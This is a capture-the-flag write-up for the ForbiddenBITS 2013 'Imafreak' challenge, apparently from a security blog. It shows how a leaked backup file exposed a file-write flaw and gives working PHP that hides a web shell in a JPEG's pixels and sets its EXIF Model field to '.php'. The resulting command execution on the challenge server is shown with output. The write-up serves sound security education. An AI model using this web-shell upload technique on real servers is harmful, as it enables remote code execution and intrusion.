Imafreak - ForbiddenBITS 2013
Marzo 17, 2013
For this challenge, we were given a link to a website (http://192.73.237.131/) and a hint (Hint6[Freak]:~), there, we can upload and see JPEG images:
By following the hint, we can get the source code of view.php script (Using ~ to retrieve the content of the temporal file: http://192.73.237.131/view.php~).
Wild vulnerability appears in these lines:
$fp=fopen($filex, 'w');
fwrite($fp, $dd);
fclose($fp);
We can control $camModel variable by modifying EXIF data on the image, and $dd variable by making a JPEG that contains a shellcode in the red channel. The objetive here is to create a PHP script (camModel = .php) with custom shellcode:
// shellcode
$shell = '<?php system($_GET["c"]);die; ?>';
$width = strlen($shell);
// create image using true color
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
// get ascii value of shellcode
$value = ord($shell[$x]);
// set a pixel using the ascii
$color = imagecolorexact($img, $value, $value, $value);
imagesetpixel($img, $x, 0, $color);
}
// save image using 100% quality
imagejpeg($img, 'imafreak.jpg', 100);
// add Model metadata using exiv2 tool
system('exiv2.exe -M "add Exif.Image.Model .php" imafreak.jpg');
The result of the script is this image (Right click, save target as, for better understanding):
By uploading the JPEG, we can execute commands on the server:
List files in root folder
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=ls%20-lia%20../
total 344 7999660 drwxr-xr-x 9 root root 4096 Mar 16 13:46 . 7999659 drwxr-xr-x 6 root root 4096 Feb 15 15:35 .. 8000136 -rw-r--r-- 1 root root 164 Mar 14 21:01 confirmed.txt 7999914 drwxr-xr-x 2 root root 4096 Mar 16 07:29 css 7999917 drwxr-xr-x 6 root root 4096 Mar 16 07:30 css_pirobox 8000029 drwxr-xr-x 2 root root 4096 Mar 16 07:31 images 8000137 -rw-r--r-- 1 root root 2588 Mar 16 07:51 index.php 8000057 drwxr-xr-x 2 root root 4096 Mar 16 07:31 js 8000138 -rw-r--r-- 1 root root 741 Dec 28 2010 piecemaker.css 8000139 -rw-r--r-- 1 root root 39 Mar 14 21:13 robots.txt 8000123 drwxrwxrwx 2 root root 49152 Mar 17 23:52 secretstoreddata 8000140 -rw-r--r-- 1 root root 57 Mar 16 07:24 super_nooooo_flag_dafuq_is_this.php 8000141 -rw-r--r-- 1 root root 8153 Apr 4 2011 templatemo_style.css 8000126 drwxrwxrwx 2 root root 225280 Mar 17 23:52 upload 8000142 -rw-r--r-- 1 root root 3203 Mar 16 13:45 upload.php 8000143 -rw-r--r-- 1 root root 3464 Mar 16 12:02 view.php 8000144 -rw-r--r-- 1 root root 3589 Mar 16 12:02 view.php~ 8000134 drwxr-xr-x 2 root root 4096 Mar 16 07:32 wehatebatman
Read first flag
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=cat%20../super_nooooo_flag_dafuq_is_this.php
/*
FLAG : dafuq_is_this_shit_i_guess_its_flag
*/
?>
Unfortunately, we were unable to get the second flag, but after the competition, Phiber from Activalink, pointed us to the second flag, it was the first JPEG image uploaded using the imafreak service (http://192.73.237.131/upload/c4ca4238a0b923820dcc509a6f75849b.jpg):
Archivado en: Retos informáticos, Seguridad |
[...] http://www.sinfocol.org/2013/03/imafreak-forbiddenbits-2013/ [...]